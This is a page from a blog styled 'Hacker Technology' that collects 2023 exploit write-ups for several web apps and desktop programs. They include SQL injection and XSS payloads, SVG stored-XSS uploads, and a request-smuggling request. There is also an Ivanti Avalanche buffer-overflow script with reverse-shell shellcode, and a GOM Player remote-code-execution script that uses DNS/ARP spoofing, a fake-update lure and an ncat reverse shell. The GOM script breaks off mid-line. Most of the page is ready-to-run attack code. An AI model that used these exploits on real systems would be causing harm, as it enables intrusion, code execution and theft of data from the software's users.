Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863112553

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 30/07/2023
# Vendor: tdevs
# Vendor Homepage: https://tdevs.co/
# Software Link: https://hyiprio-feature.tdevs.co/
# Version: 2.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CVE: CVE-2023-4382


## Description

Allows Attacker to upload malicious files onto the server, such as Stored XSS


## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /user/settings/profile-update HTTP/2

Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Skalvin");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg



[-] Done
HireHackking 
"""
Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
Date: 2023-08-16
Exploit Author: Robel Campbell (@RobelCampbell)
Vendor Homepage: https://www.ivanti.com/
Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/
Version: v6.4.0.0
Tested on: Windows 11 21H2
CVE: CVE-2023-32560
Reference: https://www.tenable.com/security/research/tra-2023-27
"""

import socket
import struct
import sys

# Create an item structure for the header and payload
class Item:
    def __init__(self, type_, name, value):
        self.type = type_
        self.name = name.encode()
        self.value = value
        self.name_size = 0x5
        self.value_size = 0x800

    def pack(self):
        return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),
                           self.type, self.name_size, self.value_size, self.name, self.value)

# Create a header structure
class HP:
    def __init__(self, hdr, payload):
        self.hdr = hdr
        self.payload = payload
        self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)

    def pack(self):
        return b''.join([item.pack() for item in self.hdr]) + \
               b''.join([item.pack() for item in self.payload]) + self.pad

# Create a preamble structure
class Preamble:
    def __init__(self, hp):
        self.msg_size = len(hp.pack()) + 16
        self.hdr_size = sum([len(item.pack()) for item in hp.hdr])
        self.payload_size = sum([len(item.pack()) for item in hp.payload])
        self.unk = 0  # Unknown value

    def pack(self):
        return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)

# Create a message structure
class Msg:
    def __init__(self, hp):
        self.pre = Preamble(hp)
        self.hdrpay = hp

    def pack(self):
        return self.pre.pack() + self.hdrpay.pack()

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python
shellcode =  b""
shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"

buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
buf += b'43' * (0x800 - len(buf))

buf2 = b'41' * 0x1000

# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)

# Default port
port = 1777

# check for target host argument
if len(sys.argv) > 1:
    host = sys.argv[1]
else:
    print("Usage: python3 CVE-2023-32560.py <host ip>")
    sys.exit()

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(msg_instance.pack())
    print("Message sent!")
    s.close()
HireHackking 
# Exploit Title: Credit Lite 1.5.4 - SQL Injection
# Exploit Author: CraCkEr
# Date: 31/07/2023
# Vendor: Hobby-Tech
# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
# Software Link: https://credit-lite.appshat.xyz/
# Version: 1.5.4
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4407
# CWE: CWE-89 - CWE-74 - CWE-707

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.



## Steps to Reproduce:

To Catch the POST Request

1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement

2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter]



Path: /portal/reports/account_statement

POST parameter 'date1' is vulnerable to SQL Injection
POST parameter 'date2' is vulnerable to SQL Injection

-------------------------------------------------------------------------
POST /portal/reports/account_statement HTTP/2

_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001
-------------------------------------------------------------------------

---
Parameter: date1 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001

Parameter: date2 (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001
---



[-] Done
HireHackking 
# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 2023-08-19
# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar
# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf
# Vulnerability Type: Buffer Overflow Local
# Tested On: Windows 10 64bit
# Tested Version: 5.0


# Steps to Reproduce:
# 1- Run the python script and create exploit.txt file
# 2- Open the application and log in
# 3- Click the "Config" button in the upper menu
# 4- Click the "User" button just below it
# 5- Now click the "Add users" button in the lower left
# 6- Fill in the Username, Password, and Confirm boxes
# 7- Paste the characters from exploit.txt into the Contact box
# 8- Click OK and crash!

#!/usr/bin/env python3

exploit = 'A' * 846

try:
    with open("exploit.txt","w") as file:
        file.write(exploit)
    print("POC is created")
except:
    print("POC not created")
HireHackking

CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

HACKER · %s · %s

# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery') # Date: 2023/08/18 # CVE: CVE-2023-38911 # Exploit Author: Daniel González # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.3.0 # Tested on: CSZ CMS 1.3.0 # Description: # CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery. # Steps to reproduce Stored XSS: Go to url http://localhost/admin/plugin/gallery/edit/2. When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2] We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields. With the following payload we can achieve the XSS Payload: <div><p title="</div><svg/onload=alert(document.domain)>"> #PoC Request: POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 140 Origin: http://localhost:8080 Referer: http://localhost:8080/admin/plugin/gallery/edit/2 Upgrade-Insecure-Requests: 1 gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add
HireHackking

Academy LMS 6.1 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload # Exploit Author: CraCkEr # Date: 05/08/2023 # Vendor: Creativeitem # Vendor Homepage: https://academylms.net/ # Software Link: https://demo.academylms.net/ # Version: 6.1 # Tested on: Windows 10 Pro # Impact: Allows User to upload files to the web server # CWE: CWE-79 - CWE-74 - CWE-707 ## Description Allows Attacker to upload malicious files onto the server, such as Stored XSS ## Steps to Reproduce: 1. Login as a [Normal User] 2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings 3. Upload any Image into the [avatar] 4. Capture the POST Request with [Burp Proxy Intercept] 5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] ----------------------------------------------------------- POST /wp-admin/async-upload.php HTTP/2 ----------------------------------------------------------- Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS by CraCkEr"); </script> </svg> ----------------------------------------------------------- 6. Send the Request 7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] 8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg [-] Done
HireHackking

AdminLTE PiHole 5.18 - Broken Access Control

HACKER · %s · %s

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) # Date: 21.12.2022 # Exploit Author: kv1to # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 # Tested on: Raspbian / Debian # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 # CVE : CVE-2022-23513 In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. ## Proof Of Concept with curl: curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' ## HTTP requests GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1 HOST: pi.hole Cookie: [..SNIPPED..] [..SNIPPED..] ## HTTP Response HTTP/1.1 200 OK [..SNIPPED..] data: Match found in [..SNIPPED..] data: <domain> data: <domain> data: <domain>
HireHackking

Kingo ROOT 1.5.8 - Unquoted Service Path

HACKER · %s · %s

#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path #Date: 8/22/2023 #Exploit Author: Anish Feroz (ZEROXINN) #Vendor Homepage: https://www.kingoapp.com/ #Software Link: https://www.kingoapp.com/android-root/download.htm #Version: 1.5.8.3353 #Tested on: Windows 10 Pro -------------Discovering Unquoted Path-------------- C:\Users\Anish>sc qc KingoSoftService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: KingoSoftService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KingoSoftService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\Anish>systeminfo Host Name: DESKTOP-UT7E7CF OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045
HireHackking

Member Login Script 3.3 - Client-side desync

HACKER · %s · %s

## Title: Member Login Script 3.3 - Client-side desync ## Author: nu11secur1ty ## Date: 08/25/2023 ## Vendor: https://www.phpjabbers.com/ ## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync ## Description: The server appears to be vulnerable to client-side desync attacks. A POST request was sent to the path '/1692959852_473/index.php' with a second request sent as the body. The server ignored the Content-Length header and did not close the connection, leading to the smuggled request being interpreted as the next request. STATUS: HIGH Vulnerability [+]Exploit: ``` POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Connection: keep-alive Cache-Control: max-age=0 Cookie: _ga=GA1.2.2069938240.1692907228; _gid=GA1.2.1275975650.1692907228; _gat=1; _fbp=fb.1.1692907228280.366290059; _ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0; YellowPages=slk3eokcgmdf0r3t7c020quv35; pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 1190 Content-Type: application/x-www-form-urlencoded GET /robots.txt HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Connection: keep-alive Cache-Control: max-age=0 GET /robots.txt HTTP/2 Host: www.pornhub.com Cookie: platform=pc; ss=405039333413129808; fg_0d2ec4cbd943df07ec161982a603817e=60256.100000; fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Full-Version: "" Sec-Ch-Ua-Arch: "" Sec-Ch-Ua-Platform: "" Sec-Ch-Ua-Platform-Version: "" Sec-Ch-Ua-Model: "" Sec-Ch-Ua-Full-Version-List: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html) ## Time spend: 00:35:00
HireHackking

SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS

HACKER · %s · %s

# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 20/08/2023 # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: 1.9.0.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4547 # CWE: CWE-79 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /search GET parameter 'filter[brandid]' is vulnerable to XSS GET parameter 'filter[price]' is vulnerable to XSS https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB XSS Payloads: vnxjb"><script>alert(1)</script>bvu51 [-] Done
HireHackking

Bus Reservation System 1.1 - Multiple-SQLi

HACKER · %s · %s

## Title: Bus Reservation System-1.1 Multiple-SQLi ## Author: nu11secur1ty ## Date: 08/26/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1 ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `pickup_id` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pickup_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The attacker can steal information from all database! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: pickup_id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT (CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT 2098) END))&session_id= Type: error-based Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET) Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(5210=5210,1))),0x716a6b7171),5210)&session_id= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT 2616 FROM (SELECT(SLEEP(15)))clIR)&session_id= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html) ## Time spend: 00:25:00
HireHackking
## Title: Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure ## Author: nu11secur1ty ## Date: 08/27/2023 ## Vendor: https://jorani.org/ ## Software: https://demo.jorani.org/session/login ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Reference: https://portswigger.net/web-security/information-disclosure ## Description: The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server. STATUS: HIGH-Vulnerability [+]Exploit: ```POST POST /session/login HTTP/1.1 Host: demo.jorani.org Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK Origin: http://demo.jorani.org Upgrade-Insecure-Requests: 1 Referer: http://demo.jorani.org/session/login Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 183 csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue= ``` [+]Response: ```HTTP HTTP/1.1 200 OK date: Sun, 27 Aug 2023 06:03:04 GMT content-type: text/html; charset=UTF-8 Content-Length: 681 server: Apache x-powered-by: PHP/8.2 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax last-modified: Sun, 27 Aug 2023 06:03:04 GMT vary: Accept-Encoding cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate pragma: no-cache x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1 x-iplb-instance: 27474 connection: close <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"> <h4>A PHP Error was encountered</h4> <p>Severity: 8192</p> <p>Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated</p> <p>Filename: controllers/Connection.php</p> <p>Line Number: 126</p> </div> <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"> <h4>A PHP Error was encountered</h4> <p>Severity: Warning</p> <p>Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p> <p>Filename: helpers/url_helper.php</p> <p>Line Number: 565</p> </div> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html) ## Time spend: 01:35:00
HireHackking

GOM Player 2.3.90.5360 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE) # Date: 26.08.2023 # Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/ # Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE # Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324 # PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8 # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide. # Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target. # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security. # Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell. # Some spaghetti and a bad code but it works :) banner = """\033[38;5;196m+-----------------------------------------------------------+ | GOM Player 2.3.90.5360 - Remote Code Execution | | Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) | +-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m""" import time,os,zipfile,subprocess,socket,sys print(banner) if os.geteuid() != 0: print("You need root privileges to run the exploit, please use sudo...") sys.exit(1) targetIP = input("- Target IP address: ") listenPort = input("- Listening port for Reverse Shell: ") def fCreate(fileName,fileContent): # File create func. f = open(fileName,"w") f.write(fileContent) f.close() gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((gw[2], 0)) ipaddr = s.getsockname()[0] gateway = gw[2] host = socket.gethostname() print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...") smbFolderName = "GomUpdater" # change this (optional) expWorkDir = "gomExploitDir" # change this (optional) os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit. time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit. time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat print(" [*] - Ncat has been downloaded.") subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket print(" [*] - Impacket has been downloaded.") subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py print(" [*] - DNSSpoof.py has been downloaded.") print("[*]- Stage 2: Creating Attacker SMB Server...") subprocess.Popen("cd gomExploitDir/impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server. time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddr spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP print("[*]- Stage 3: Creating Attacker Web Page...") # change this (optional) screenExpPage = """ <meta charset="utf-8"> <script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""'; </script> """ fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage) time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...") vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%") WScript.Sleep 5000 Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional) vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort) fCreate(expWorkDir + "/payload.vbs",vbsCommand) urlShortcut = '''[InternetShortcut] URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs IDlist=''' fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut) time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip" payload_filename = os.path.join(expWorkDir, "payload.vbs") with zipfile.ZipFile(zipName, "w") as malzip: malzip.write(payload_filename, arcname=os.path.basename(payload_filename)) print("[*]- Stage 5: Running the attacker's web server...") subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...") subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing... time.sleep(10) # It's neccesary for exploit stability. os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target. print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n") subprocess.run("nc -lvnp " + listenPort,shell=True) subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f 